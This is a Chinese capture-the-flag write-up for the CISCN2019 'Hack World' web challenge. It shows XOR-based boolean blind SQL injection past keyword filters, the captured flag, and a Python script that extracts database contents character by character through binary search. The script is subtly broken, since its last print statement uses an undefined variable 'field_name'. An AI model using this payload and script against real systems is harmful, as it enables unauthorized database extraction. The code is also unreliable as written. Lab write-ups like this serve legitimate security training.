[CISCN2019 華北賽區 Day2 Web1]Hack World 1

TazmiDev發表於2024-11-10
Web

[CISCN2019 華北賽區 Day2 Web1]Hack World 1

開啟例項發現是個POST注入框

image-20241110125610786

盲猜SQL隱碼攻擊,萬能密碼檢測無果,而且經過測試存在大量sql關鍵字過濾

image-20241110125722596

嘗試使用(),出現了bool(false),確定這是一道布林注入題

image-20241110125816852

and被禁用,決定採用異或^注入

構建payload指令碼梭哈:

image-20241110143437844

成功獲得flag:

image-20241110143511877

flag{a2f7089d-bd8c-4659-bcd6-9c3b3e4780dc}

附指令碼:

import requests
import time

def jiaoben(url, field_length=50, request_interval=0.01):
    result = ''
    for i in range(1, field_length + 1):
        max_val = 127
        min_val = 0
        while (max_val - min_val) > 1:
            mid_val = (max_val + min_val) // 2
            payload = f'1^(ascii(substr((select(flag)from(flag)),{i},1))>{mid_val})=1'
            response = requests.post(url, data={'id': payload})
            if 'Hello' in response.text:
                max_val = mid_val
            else:
                min_val = mid_val
            time.sleep(request_interval)
        result += chr(max_val)
        print(result)  # 實時列印當前猜測的欄位值
    print(f"Final result for {field_name}: {result}")
    return result

url = ''
jiaoben(url)

相關文章